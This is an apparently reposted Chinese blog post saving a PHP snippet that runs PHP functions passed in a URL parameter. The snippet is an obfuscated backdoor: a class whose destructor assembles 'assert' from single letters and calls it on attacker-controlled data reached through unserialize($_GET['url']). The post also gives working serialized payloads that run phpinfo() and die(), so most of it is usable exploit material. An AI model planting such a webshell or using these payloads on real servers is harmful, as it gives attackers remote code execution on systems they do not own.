群里一个高手写的url?传参执行php函数的小程序, 收藏下
2024-10-20 20:53:59
<?php
// +----------------------------------------------------------------------
// | Copyright (c) 2006-2012 KingBin All rights reserved.
// +----------------------------------------------------------------------
// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
// +----------------------------------------------------------------------
// | Author: KingBin 1055692563@qq.com
// +----------------------------------------------------------------------
error_reporting(0);
class test
{
public $fn=array('a','s','s','e','r','t');
public $str; function __destruct()
{
$r = join(null,$this->fn);
return $r($this->str);
}
} if($_GET['url']) unserialize($_GET['url']) && die(); show_source(__FILE__); ?>
所以 只要我们提交一个
$o=new test; $o->str='phpinfo()'; 那么是不是就会起到执行phpinfo呢? 所以转换一下 xx.php?url=O:4:"test":1:{s:3:"str";s:9:"phpinfo()";} 就会执行了 这个类~~~~
$o=new test; $o->str='phpinfo()'; 那么是不是就会起到执行phpinfo呢? 所以转换一下 xx.php?url=O:4:"test":1:{s:3:"str";s:9:"phpinfo()";} 就会执行了 这个类~~~~
如
?url=O:4:%22test%22:2:{s:2:%22fn%22;a:6:{i:0;s:1:%22a%22;i:1;s:1:%22s%22;i:2;s:1:%22s%22;i:3;s:1:%22e%22;i:4;s:1:%22r%22;i:5;s:1:%22t%22;}s:3:%22str%22;s:18:%22die('heelo%20world')%22;}
最新文章
- python之最强王者(1)——python入门简介
- oracle中的使用总结一
- Unity上一页下一页切换功能实现源码(仅供参考)
- linux之LVM
- wampserver中Apache启动不了的问题
- vim 空格 制表符
- 调试X Server
- Eclipse去除JavaScript验证错误
- C++_Eigen函数库用法笔记——Advanced Initialization
- [ACDream 1430]SETI 后缀数组
- Codeforces 475D CGCDSSQ(分治)
- hdu 3111 DLX解数独
- VS2013 右键监视,未能计算表达式的值
- 排序算法ONE:选择排序SelectSort
- rsync数据同步配置
- Python+Flask搭建mock api server
- promise之我见
- C#判断日期是否合法
- 【转载】MSXML应用总结 开发篇(下)
- HTTP请求方式及状态码